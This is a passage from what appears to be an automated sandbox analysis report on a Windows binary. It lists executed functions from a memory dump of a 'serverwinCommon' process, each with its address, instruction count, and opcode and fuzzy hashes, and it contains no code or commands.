                          • Associated: 00000000.00000002.1655612123.00000000003AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003B4000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655612123.00000000003D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1655653561.00000000003D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_370000_CRf9KBk4ra.jbxd
                          Similarity
                          • API ID: FindHandleModuleResource
                          • String ID: RTL
                          • API String ID: 3537982541-834975271
                          • Opcode ID: dc8a1dc76758d6426c0bc8704b64f249824f305fb7d8eb264358a1d5b5062ba0
                          • Instruction ID: c31bb65642da44d72b0acf33ccf7fe3e411a5c72693dfa230a54bfe41701928d
                          • Opcode Fuzzy Hash: dc8a1dc76758d6426c0bc8704b64f249824f305fb7d8eb264358a1d5b5062ba0
                          • Instruction Fuzzy Hash: B6C01232289350B6EB3267306C0EB837A5CAB12B12F0A044CF246DA1D0DAE9CA4087A1

                          Executed Functions

                          Function 00007FFD9B7655F2 Relevance: 4.4, Strings: 2, Instructions: 1880COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID: IU_H$WVUS
                          • API String ID: 0-2154563725
                          • Opcode ID: d279aaa99d25ea711512b4e3fee992a08d1b0033019df6299b16e16c78442d97
                          • Instruction ID: 705d7039c3b8636ae7903c5bb3c40c4af3927a29d07cb78158821e84b19ee5e6
                          • Opcode Fuzzy Hash: d279aaa99d25ea711512b4e3fee992a08d1b0033019df6299b16e16c78442d97
                          • Instruction Fuzzy Hash: 8DE21174A1961D8FDBA4DB58C8A5AA8B7F1FF58300F5502F9D00DD72A6CA34AE81CF41
                          Function 00007FFD9B753505 Relevance: .3, Instructions: 319COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6d19bc974492c1bd6bad90bb37449f382d78315451462a7c59c52d29111605ca
                          • Instruction ID: 47ea0fa438ca009fb53eac7b3394f38fc005c2a1fe1d793baff48e427af3d2b0
                          • Opcode Fuzzy Hash: 6d19bc974492c1bd6bad90bb37449f382d78315451462a7c59c52d29111605ca
                          • Instruction Fuzzy Hash: 1CB1C271E19A4D8FEB94DFA8C4657AD7BE1FF99300F5102BAD01AC72E5DBB428018750
                          Function 00007FFD9B753585 Relevance: .3, Instructions: 253COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aa2b3bdafcce60ba1223955de005359f242a1de52661fdf29fbd72b11e06c76a
                          • Instruction ID: b2705c76cf3dcb275c4d1910cdfeec33f8e84549cfea4f18ce040bb0c5e175fb
                          • Opcode Fuzzy Hash: aa2b3bdafcce60ba1223955de005359f242a1de52661fdf29fbd72b11e06c76a
                          • Instruction Fuzzy Hash: F581A471E19A4D8FE794DBA8D8757AC7BE1EF95310F4142B9D00EC72E6DBB428028750
                          Function 00007FFD9B75F8D4 Relevance: 2.5, Strings: 2, Instructions: 49COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID: #$=
                          • API String ID: 0-1825213468
                          • Opcode ID: 33ae91df2d985d1c7cd2f6ac2b0852c3b6d80b676a5c04f4f2b87561c2ab83d0
                          • Instruction ID: 55d3de0f0def803d2e2f8be651afdde12f627f2dc91244fdfa3a29c9b39db84e
                          • Opcode Fuzzy Hash: 33ae91df2d985d1c7cd2f6ac2b0852c3b6d80b676a5c04f4f2b87561c2ab83d0
                          • Instruction Fuzzy Hash: E311BD70D0A72D8FDB64DF94D8A47A9B7B1EB94301F1046EAD409A62A1DB786F81CF40
                          Function 00007FFD9B75EF7C Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID: c${
                          • API String ID: 0-2213537145
                          • Opcode ID: 7f2cde3d568e5cad442f2dc9d93c78a8ef91c767a8fcc4a0bdeaa94852fbcce9
                          • Instruction ID: 2d41e170398be235fbe0da297ccb556e97c5fe19049b150bcc4d0376db4564ee
                          • Opcode Fuzzy Hash: 7f2cde3d568e5cad442f2dc9d93c78a8ef91c767a8fcc4a0bdeaa94852fbcce9
                          • Instruction Fuzzy Hash: C5110A3090932DCAEB74DF90C8A47A877B1EB54300F1146F9C10D962A1CBB85B81CF41
                          Function 00007FFD9B75C64D Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID: bR_H
                          • API String ID: 0-2591527539
                          • Opcode ID: 504f061e35c9decf738a561c0633b66b4d980a7e980dc59535a8c94b38631ff6
                          • Instruction ID: 0e323e6e86d90ed49dedc2a62562e1169318acf6982b3be2b91f6cd57ef9020d
                          • Opcode Fuzzy Hash: 504f061e35c9decf738a561c0633b66b4d980a7e980dc59535a8c94b38631ff6
                          • Instruction Fuzzy Hash: DF516070E1961D8FEBA4DBA8C8A47EDB7B1FB58300F1102B9D00DE32A5DF7469858B40
                          Function 00007FFD9B75D829 Relevance: .4, Instructions: 397COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: caa7416990e44682fb70b7fecba4636d4e3c4dac99f02fc3a0e3ad93abad9c57
                          • Instruction ID: a95659ccf66a39250b0b0e5620b72b19ea80c840d4c14f421d10ec440e8d7558
                          • Opcode Fuzzy Hash: caa7416990e44682fb70b7fecba4636d4e3c4dac99f02fc3a0e3ad93abad9c57
                          • Instruction Fuzzy Hash: 84E13E71E29A5D8FEB68DF98C464BA8B7A2FF58300F4441BAD00DD72E6CA746941CB41
                          Function 00007FFD9B75D840 Relevance: .3, Instructions: 302COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 413a6338dd8e972686ef86692289c70c855013fe7d2b4b28baa836f5ca41f97e
                          • Instruction ID: 706a3f1b05eb81527ed6b1f626b2087225db82b0b8bfa77d5e22afd677e2ff97
                          • Opcode Fuzzy Hash: 413a6338dd8e972686ef86692289c70c855013fe7d2b4b28baa836f5ca41f97e
                          • Instruction Fuzzy Hash: 97B12F71E29A5D8FEBA8DF98C464BB8B7A2FF54300F4401BAD00DD72E6DA746941CB41
                          Function 00007FFD9B751668 Relevance: .3, Instructions: 281COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7d954d34fbed9004eec7c5d92876050f068bb29d0a4f6b00cf922c16512945d3
                          • Instruction ID: 10eb83e45f4720a86edaa3ee20d3a071ebc628ca5042b4b9c92c4ff2ffa2c879
                          • Opcode Fuzzy Hash: 7d954d34fbed9004eec7c5d92876050f068bb29d0a4f6b00cf922c16512945d3
                          • Instruction Fuzzy Hash: EB81EF31B09B4D4FDB68DE9888615A977E2EF98301B15027EE45EC32E2DE75AD02C780
                          Function 00007FFD9B7639A5 Relevance: .2, Instructions: 243COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 72f9fd8801176b09e2a98448e90ac99d5b67d117f5aa4cbddd0e94d812fe43c9
                          • Instruction ID: d52b23b4ac7fc9d4bdaa3f1cfe5d801f2a70b2e8d9e45857241b5d0b9db7c57a
                          • Opcode Fuzzy Hash: 72f9fd8801176b09e2a98448e90ac99d5b67d117f5aa4cbddd0e94d812fe43c9
                          • Instruction Fuzzy Hash: DA91CE70E0961D8EEBA4DBA8C8557EDB6B1FF59300F5142BAD00DE32A2DF345A84CB51
                          Function 00007FFD9B75AC9D Relevance: .2, Instructions: 222COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e6ab3766288a415c9a0239361f39a4c5517540c07f10e7dc9bcc4e81d9b89c36
                          • Instruction ID: 356497798e5f24eca221dfe076b40ea9feaa97e5cec6293d42de10be0a94f7d7
                          • Opcode Fuzzy Hash: e6ab3766288a415c9a0239361f39a4c5517540c07f10e7dc9bcc4e81d9b89c36
                          • Instruction Fuzzy Hash: A5711671F0E78E8FE761ABE898655E93BE0FF55310B0606B6D058C70F6EE646A468340
                          Function 00007FFD9B751CBD Relevance: .2, Instructions: 216COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 70972863b7766345bacb9af7260921b74bc5bb7bdf4dd723cfc0336b3a6fa686
                          • Instruction ID: 5ba6e450c476cdfe393176f627309ce524d5539c8ea5862b1f7d7310a148595d
                          • Opcode Fuzzy Hash: 70972863b7766345bacb9af7260921b74bc5bb7bdf4dd723cfc0336b3a6fa686
                          • Instruction Fuzzy Hash: 1D61E031B09B8E4FDB58DE9888605B973E2FF98301B15427ED45EC76A2CE75A902C780
                          Function 00007FFD9B750D2A Relevance: .2, Instructions: 211COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a7eb44029044bbe93236063c5642445f7c5f18471807986e6affb2c31dba1a77
                          • Instruction ID: fdc562df3f5bf07db8fefb2c69d973be4b752f302a4e9dc07f2cd970395b4bc2
                          • Opcode Fuzzy Hash: a7eb44029044bbe93236063c5642445f7c5f18471807986e6affb2c31dba1a77
                          • Instruction Fuzzy Hash: B671B531E09A0E4FEB68EBA4C865FAD73A1FF55310F1142B9D00D971F6DE746A468B40
                          Function 00007FFD9B75AC18 Relevance: .2, Instructions: 198COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e24bd81aefec355d2225fb12e5839aaf1c8dbf0b406b97b469b481a12d47229c
                          • Instruction ID: 49024ccd83d6d759d7a6127655584c12a4e9565fae9ed78d5d4bb380e8a622db
                          • Opcode Fuzzy Hash: e24bd81aefec355d2225fb12e5839aaf1c8dbf0b406b97b469b481a12d47229c
                          • Instruction Fuzzy Hash: 3061E970E0961D8EEBA4EBE8C8657EDB7F1EF58300F514279D00DE32A1DE746A428B50
                          Function 00007FFD9B7531B1 Relevance: .2, Instructions: 197COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 03303557fdfa147222715a1c04fb2db4f164d25c9766ae7fc6c556dfd3c3ecf8
                          • Instruction ID: a84036e65445003cf96f43c409d699e0a99ac5dfe0f43b32d602cd1c622bb85e
                          • Opcode Fuzzy Hash: 03303557fdfa147222715a1c04fb2db4f164d25c9766ae7fc6c556dfd3c3ecf8
                          • Instruction Fuzzy Hash: A3714C71E0961D8EEB64DBE4C4646ED77F1EF54301F12427AD00AE72B2DB786A45CB10
                          Function 00007FFD9B765EC5 Relevance: .2, Instructions: 192COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d00bc82f8f9494a559e021829670bd052db703527b00474e22bff4a9494a8ef2
                          • Instruction ID: 3c84d381b88a1a257a28b07785ed6c6b558682fd87b5cdd705f5977cebf3040a
                          • Opcode Fuzzy Hash: d00bc82f8f9494a559e021829670bd052db703527b00474e22bff4a9494a8ef2
                          • Instruction Fuzzy Hash: 7F710A70E0961DCEEBA4DBA4C4657ECB7B1FF55300F4142BAD00DA62A1DF386A85DB42
                          Function 00007FFD9B750DDC Relevance: .2, Instructions: 174COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f8cf73e6ebdf59689db24b0b563ad0f3cd2e3ed1986ad263c4c45eb5c95117bf
                          • Instruction ID: 97e6d35813c446a46f21ed5003e8253a9038650f24aff68ee52eaf19cdafe2fa
                          • Opcode Fuzzy Hash: f8cf73e6ebdf59689db24b0b563ad0f3cd2e3ed1986ad263c4c45eb5c95117bf
                          • Instruction Fuzzy Hash: 5451B671E0AA0E4FEBA8EB94C865FAD73A1FF55300F1142B9D00D971F6DE746A868740
                          Function 00007FFD9B7520D5 Relevance: .2, Instructions: 166COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7fb81dddff8b9e2896c49127cadd0cf5ea134753cc7d4d772abb285b9d8750a3
                          • Instruction ID: 8dd859f02a0a554e091916ee7b877c20b533790b6a673c9a085e8df8cd8a042e
                          • Opcode Fuzzy Hash: 7fb81dddff8b9e2896c49127cadd0cf5ea134753cc7d4d772abb285b9d8750a3
                          • Instruction Fuzzy Hash: CF413731B0E74E4FE768DBE898655BA77E1EF85300F0542BBE44DC31B6DE68A9428341
                          Function 00007FFD9B752218 Relevance: .2, Instructions: 165COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 481ad82a19b356155686c912e8b90d12505b896d7376735acb75b7dbdfb6f88b
                          • Instruction ID: a3442370a871bdec66320b7028ed08c6b0acacd55643e98fb17fd52b9a88a06f
                          • Opcode Fuzzy Hash: 481ad82a19b356155686c912e8b90d12505b896d7376735acb75b7dbdfb6f88b
                          • Instruction Fuzzy Hash: A8519435E0E74E8AEB749AE088216F977A0EF55300F1603B9D01D971F2DEA86B46C681
                          Function 00007FFD9B761940 Relevance: .1, Instructions: 132COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 036953a25a957d26e0d76233d607a0b48e3fa99a783d812cc662c0eeea1dd7b8
                          • Instruction ID: d8852cae1a7056049a425d899e2e40a49ac011787cb93fa7f21852fb9c067996
                          • Opcode Fuzzy Hash: 036953a25a957d26e0d76233d607a0b48e3fa99a783d812cc662c0eeea1dd7b8
                          • Instruction Fuzzy Hash: 9B516CA180E7C54FD7038B748C7A5A57FB0AF27204B0E45EBD485CB0B3E2689959D763
                          Function 00007FFD9B751241 Relevance: .1, Instructions: 124COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 496fc752baaed84c8306e29c49ab2c390da67674f119fcc7827f118f21bfd1fd
                          • Instruction ID: 0962f58785ef9e707122ba9ac5563562ffb84a2bd42987d9340f0a079cca4b1c
                          • Opcode Fuzzy Hash: 496fc752baaed84c8306e29c49ab2c390da67674f119fcc7827f118f21bfd1fd
                          • Instruction Fuzzy Hash: 4341F231B0964E4FEF68EBA8C8756F977A0EF59301F0101BAD01AD75A2DEA5AA05C740
                          Function 00007FFD9B75BBB9 Relevance: .1, Instructions: 104COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aa30d7f4ee1496279e0c69a590544f4b0006ab7422a9d891ff2bb44c88d78988
                          • Instruction ID: 35ecb39317f94c7ae5ec3a903df7c27549f56c8d2dbb9e92d2a40f60f68e385e
                          • Opcode Fuzzy Hash: aa30d7f4ee1496279e0c69a590544f4b0006ab7422a9d891ff2bb44c88d78988
                          • Instruction Fuzzy Hash: 94315E30E0A64E8FEB60DFE484252FD77B0EF19300F01427AD019E72F6DAB8A9058B54
                          Function 00007FFD9B767495 Relevance: .1, Instructions: 101COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e42a520acfeccbdc55d8f2254898e53fc17370a698ceb0196f914e9cd4b3958e
                          • Instruction ID: 1f2337be677fa35556bc2f3f44ca721dfc11bbf75bbd60c37c6e2c77deef2ae2
                          • Opcode Fuzzy Hash: e42a520acfeccbdc55d8f2254898e53fc17370a698ceb0196f914e9cd4b3958e
                          • Instruction Fuzzy Hash: 8B31B631E0E34EDEEB619BA4C8686ED3BE0EF15350F054276C819D71B2EA38A944C712
                          Function 00007FFD9B75C850 Relevance: .1, Instructions: 99COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 60cad7f6dd92f78196ab91e21db25b5bc3fde9a967875353808a8bd245639090
                          • Instruction ID: 0ba37521747198b189e32705bf83e3b9e57ffcc897bb3bfc9a984ddfd503d808
                          • Opcode Fuzzy Hash: 60cad7f6dd92f78196ab91e21db25b5bc3fde9a967875353808a8bd245639090
                          • Instruction Fuzzy Hash: 1F31C136A4A74E5FEB66BBF894256FC3BA0EF25314F0506BBD01DDA0F2CE6435418690
                          Function 00007FFD9B765708 Relevance: .1, Instructions: 99COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cccaace26c4709808b34752a1222894636511eab5bf64ca3d647fcc5acdb8398
                          • Instruction ID: de1d3ea66c5cc6099b468e295b02d14da5f8c85721fe1c836e4becbffeccb520
                          • Opcode Fuzzy Hash: cccaace26c4709808b34752a1222894636511eab5bf64ca3d647fcc5acdb8398
                          • Instruction Fuzzy Hash: 3431F970A1961ECFDBA4EE58C8547F977F0EF19305F0102B6940DE3261DB34AA80DB81
                          Function 00007FFD9B7533D8 Relevance: .1, Instructions: 93COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ac418590403a510664e5f3eec042946316cb327d79151947d6b8b943f82c5528
                          • Instruction ID: a8b4e7509a2e44d9d2e20c1ceec671adccfb6605e721bb27f21b5fd7e253daaf
                          • Opcode Fuzzy Hash: ac418590403a510664e5f3eec042946316cb327d79151947d6b8b943f82c5528
                          • Instruction Fuzzy Hash: 9021DD3090E78A8FD742EBB488645A93FF0EF17310B0605F6D009CB0B2DA78AA46C721
                          Function 00007FFD9B767B11 Relevance: .1, Instructions: 92COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6ad9625d1bc56464062d48a50900554dfee771cf51c91e845e147cf396976cdd
                          • Instruction ID: e4b72509afba717f2ff5d689796786325dc5d40e99ae5ae904adbaf6445fc26a
                          • Opcode Fuzzy Hash: 6ad9625d1bc56464062d48a50900554dfee771cf51c91e845e147cf396976cdd
                          • Instruction Fuzzy Hash: CE31AD30A0E64EDFEB68DA68C8646F977A0FF15344F11067AC81AC61F1DE78AA448702
                          Function 00007FFD9B766D7D Relevance: .1, Instructions: 89COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 741c39a5db8a5a8d847483d0c3e9650ce9d015923f1de0ef3c65f25df8739245
                          • Instruction ID: 4d900ee4e8cdc3188a4a6e758f4793f40fc23281d5f983c91dcc3fd8b6a51bb2
                          • Opcode Fuzzy Hash: 741c39a5db8a5a8d847483d0c3e9650ce9d015923f1de0ef3c65f25df8739245
                          • Instruction Fuzzy Hash: 0531E471A0AA4E8FEF69AE6484352F936E1FF15300F4101BED41DC21F2DF35A9549742
                          Function 00007FFD9B7672A1 Relevance: .1, Instructions: 87COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d4df51dc27417eb38d79b704eb7cdb488795cc1016f019f9556050c47288a9af
                          • Instruction ID: 0f0b29da8f06c9c6432b88b65c30c2ec425b3cab4d61426b7f49d5af4f943558
                          • Opcode Fuzzy Hash: d4df51dc27417eb38d79b704eb7cdb488795cc1016f019f9556050c47288a9af
                          • Instruction Fuzzy Hash: 67216231E0E60E9EEB61EBA4C8587BD77F4FF19341F010675E818D30B1DA38A6508711
                          Function 00007FFD9B75C7FB Relevance: .1, Instructions: 87COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e04bc676e82f8a8874dd789deefd6db87a6b9c9ff8be876c8de7ef7b60cb7cb1
                          • Instruction ID: c72413005bcd337eb53eb3cf81a72feaec75efc39ac0b3c782d8b87aee822c8a
                          • Opcode Fuzzy Hash: e04bc676e82f8a8874dd789deefd6db87a6b9c9ff8be876c8de7ef7b60cb7cb1
                          • Instruction Fuzzy Hash: D521D126F4E75A5EEB6676F8A4252FC37A0EF61324F0502B6E01DD50F3CE6835418690
                          Function 00007FFD9B750A01 Relevance: .1, Instructions: 86COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000004.00000002.1707932565.00007FFD9B750000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B750000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_7ffd9b750000_serverwinCommon.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 40bcfc034edc0985d8130d4d309f58e63961670c6b7220e2a3927cadb5fd709e
                          • Instruction ID: 3a516c6a2b6099b5387d78f9f80ed487521f3f8f7d75e318f4997108f81708f0
                          • Opcode Fuzzy Hash: 40bcfc034edc0985d8130d4d309f58e63961670c6b7220e2a3927cadb5fd709e
                          • Instruction Fuzzy Hash: 6321B335E0E60E4EFBA0EBE888696F977E0FF55700F014676D41DC60B6EE74A6428700
                          Function 00007FFD9B763B23 Relevance: .1, Instructions: 82COMMON
                          Download Yara Rule
                          Memory Dump Source
